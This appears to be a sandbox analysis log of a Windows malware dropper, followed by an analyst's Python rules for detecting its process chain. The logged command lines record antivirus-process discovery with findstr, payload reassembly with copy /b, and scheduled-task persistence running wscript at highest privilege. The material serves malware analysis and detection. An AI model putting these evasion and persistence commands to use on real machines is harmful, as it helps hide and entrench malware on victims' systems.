Source: C:\Users\user\Desktop\DA92phBHUS.exe | Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EA4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\DA92phBHUS.exe | Code function: 0_2_004024FB CoCreateInstance
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EA443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | File created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:732:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Kmswbx3MNQibZuVT
Source: C:\Users\user\Desktop\DA92phBHUS.exe | File created: C:\Users\user\AppData\Local\Temp\nsdFDD7.tmp
Source: C:\Users\user\Desktop\DA92phBHUS.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat
Source: DA92phBHUS.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\DA92phBHUS.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\DA92phBHUS.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: DA92phBHUS.exe | ReversingLabs: Detection: 18%
Source: C:\Users\user\Desktop\DA92phBHUS.exe | File read: C:\Users\user\Desktop\DA92phBHUS.exe
Source: unknown | Process created: C:\Users\user\Desktop\DA92phBHUS.exe "C:\Users\user\Desktop\DA92phBHUS.exe"
Source: C:\Users\user\Desktop\DA92phBHUS.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 438799
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "pantyhoseyourslandscapesdisposition" Flyer
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Turn + ..\Tale + ..\Intensity L
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Dump.pif L
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr" "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m"
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Process created: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe
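The process-creation rows above are the whole infection chain in order: the dropper runs a batch file that greps tasklist output for security products, strips junk lines from "Flyer" with findstr /V, glues three fragments together with copy /b, starts the resulting Dump.pif (the same SHA256 the report later records for ImageSyncProX.scr), registers two scheduled tasks that run wscript //B on a JScript file at the highest run level, and finally launches a RegAsm.exe copy out of Temp. As an added example, not Joe Sandbox output and not code from the sample, the Python below re-encodes those rows as constructed events and runs a small set of detection rules over them. The ProcEvent structure, the tag names and the user-writable-path heuristic are my own assumptions; the AV process names are exactly the ones in the report's findstr arguments.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# AV/EDR process names the dropper greps for, copied from the report's two findstr invocations.
AV_PROCESS_NAMES = {"wrsa", "opssvc", "avastui", "avgui", "bdservicehost", "nswscsvc", "sophoshealth"}
# Extensions Windows runs as PE files but user-land software rarely ships; the chain uses .pif and .scr.
ODD_PE_EXTENSIONS = (".pif", ".scr", ".com")
# User-writable profile locations (assumption: a path heuristic is enough for this chain).
USER_WRITABLE = re.compile(r"\\AppData\\(Local|Roaming)\\", re.IGNORECASE)


@dataclass
class ProcEvent:
    parent: str   # image path of the creating process
    image: str    # image path of the created process
    cmdline: str  # its command line as logged


# Constructed from the report's "Process created" rows: (parent, image, command line).
EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\DA92phBHUS.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\findstr.exe", r'findstr /I "wrsa opssvc"'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\findstr.exe",
              r'findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\findstr.exe",
              r'findstr /V "pantyhoseyourslandscapesdisposition" Flyer'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r"cmd /c copy /b ..\Turn + ..\Tale + ..\Intensity L"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Users\user\AppData\Local\Temp\438799\Dump.pif", "Dump.pif L"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\schtasks.exe",
              r"""schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST"""),
    ProcEvent(r"C:\Users\user\AppData\Local\Temp\438799\Dump.pif", r"C:\Windows\SysWOW64\schtasks.exe",
              r"""schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc onlogon /F /RL HIGHEST"""),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr",
              r'"C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr" "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m"'),
    ProcEvent(r"C:\Users\user\AppData\Local\Temp\438799\Dump.pif", r"C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe",
              r"C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe"),
]


def tokenize(cmdline: str) -> list[str]:
    """Split on whitespace, keeping double-quoted arguments whole (quotes stripped).
    No escape handling on purpose: shlex would eat the unquoted backslashes in these paths."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_schtasks(cmdline: str) -> dict | None:
    """Task name, action, schedule and run level from a 'schtasks /create' line, else None."""
    toks = tokenize(cmdline)
    low = [t.lower() for t in toks]
    if not low or low[0].split("\\")[-1] not in ("schtasks", "schtasks.exe") or "/create" not in low:
        return None
    keys = {"/tn": "name", "/tr": "action", "/sc": "schedule", "/rl": "runlevel"}
    out = dict.fromkeys(keys.values())
    for i, t in enumerate(low[:-1]):
        if t in keys:
            out[keys[t]] = toks[i + 1]
    return out


def classify(ev: ProcEvent) -> list[str]:
    """Detection tags that fire for one process-creation event."""
    tags, image = [], ev.image.lower()
    low = [t.lower() for t in tokenize(ev.cmdline)]
    # 1. AV discovery: findstr over tasklist output with security-product names as the pattern.
    if image.endswith("findstr.exe"):
        words = {w for t in low[1:] if not t.startswith(("/", "-")) for w in t.split()}
        if words & AV_PROCESS_NAMES:
            tags.append("av_process_discovery")
    # 2. Payload reassembly: 'copy /b a + b + c out' glues split fragments back into one file.
    if image.endswith("cmd.exe") and {"copy", "/b", "+"} <= set(low):
        tags.append("fragment_concatenation")
    # 3. PE with a disguised extension started from a user-writable path.
    if image.endswith(ODD_PE_EXTENSIONS) and USER_WRITABLE.search(ev.image):
        tags.append("disguised_pe_from_appdata")
    # 4. Persistence: task action is a silent script host (wscript //B), run level HIGHEST.
    task = parse_schtasks(ev.cmdline) if image.endswith("schtasks.exe") else None
    if task:
        action = (task["action"] or "").lower()
        if "wscript" in action and "//b" in action:
            tags.append("schtask_wscript_silent")
        if (task["runlevel"] or "").lower() == "highest":
            tags.append("schtask_runlevel_highest")
    # 5. Script host launching a binary out of the user profile.
    if ev.parent.lower().endswith("wscript.exe") and USER_WRITABLE.search(ev.image):
        tags.append("wscript_spawns_appdata_binary")
    # 6. RegAsm.exe executed from a copy outside its Microsoft.NET directory.
    if image.endswith("regasm.exe") and "microsoft.net" not in image:
        tags.append("relocated_regasm")
    return tags


def triage(events: list[ProcEvent]) -> dict[str, list[int]]:
    """Map each tag to the indices of the events that triggered it."""
    hits: dict[str, list[int]] = {}
    for i, ev in enumerate(events):
        for tag in classify(ev):
            hits.setdefault(tag, []).append(i)
    return hits


def persistence_artifacts(events: list[ProcEvent]) -> list[dict]:
    """Scheduled tasks the chain registers, in creation order."""
    return [t for ev in events if (t := parse_schtasks(ev.cmdline))]


if __name__ == "__main__":
    print(triage(EVENTS), *persistence_artifacts(EVENTS), sep="\n")
```

On real telemetry, replace EVENTS with Sysmon event ID 1 or EDR process-creation records carrying the same three fields. The rules are deliberately narrow: the AV rule needs both the findstr image and the product names, so the plain tasklist runs and the findstr /V de-obfuscation step in the same chain produce no hit, and the task rule keys on the action rather than the task name, which the dropper can change freely.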
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\DA92phBHUS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: aclayers.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: sfc.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: sfc_os.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: amsi.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: rasman.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: rtutils.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: secur32.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: schannel.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: avicap32.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: msvfw32.dll
                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\DA92phBHUS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
